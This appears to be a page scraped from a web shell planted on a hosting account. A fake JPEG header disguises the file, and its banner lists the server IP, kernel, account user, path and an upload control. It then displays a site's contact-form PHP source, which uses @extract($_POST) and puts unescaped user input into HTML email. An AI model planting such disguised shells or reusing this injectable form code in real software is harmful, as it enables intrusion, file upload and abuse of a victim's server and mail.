���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.163 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/totalacousticsolutions.in/public_html/ |
Upload File : |
<?php @extract($_POST); if (isset($submit_form)) { require("email_server/email.php"); $mail->From = "inquiry@adjointinfocom.com"; $mail->FromName = "Enquiry Received From"; $mail->AddAddress("totalacousticsolutions@gmail.com"); //$mail->AddReplyTo("mail@mail.com"); $mail->IsHTML(true); $mail->Subject = "You have received an enquiry!"; $mail->Body = ' <html> <head> <title>You have received an enquiry!</title> </head> <body> <table width="100%" style="border:1px solid;" cellpadding="1" cellspacing="1"> <tbody> <table width="100%" style="border:1px solid;" cellpadding="35" cellspacing="1"> <tr> <td style="background:#0183cf; text-align: center; font-size: 25px; color:#fff;"> Total Acoustic Solutions </td> </tr> </table> <table width="100%" cellpadding="1" cellspacing="10"> <tr> <td>You Have received a enquiry from <b>Adjoint Infocom Private Limited</b></td> </tr> <tr> <td>Your Enquiry Details are given below:</b></td> </tr> </table> <table width="50%" cellpadding="10" cellspacing="0" border="1px"> <tr> <td><b>Name </b></td> <td>' . $name . '</td> </tr> <tr> <td><b>Email </b></td> <td>' . $email . '</td> </tr> <tr> <td><b>Phone. </b></td> <td>' . $phone . '</td> </tr> <tr> <td><b>Subject.</b></td> <td>' . $subject . '</td> </tr> <tr> <td><b> Message </b></td> <td>' . $message . '</td> </tr> </table> </tbody> </table> </body> </html> '; //$mail->AltBody = "This is the body in plain text for non-HTML mail clients"; if (!$mail->Send()) { echo "Message could not be sent. <p>"; echo "Mailer Error: " . $mail->ErrorInfo; exit; } // header("Location:/thank-you.php"); echo '<script>window.location = "thank-you.php"; </script>'; }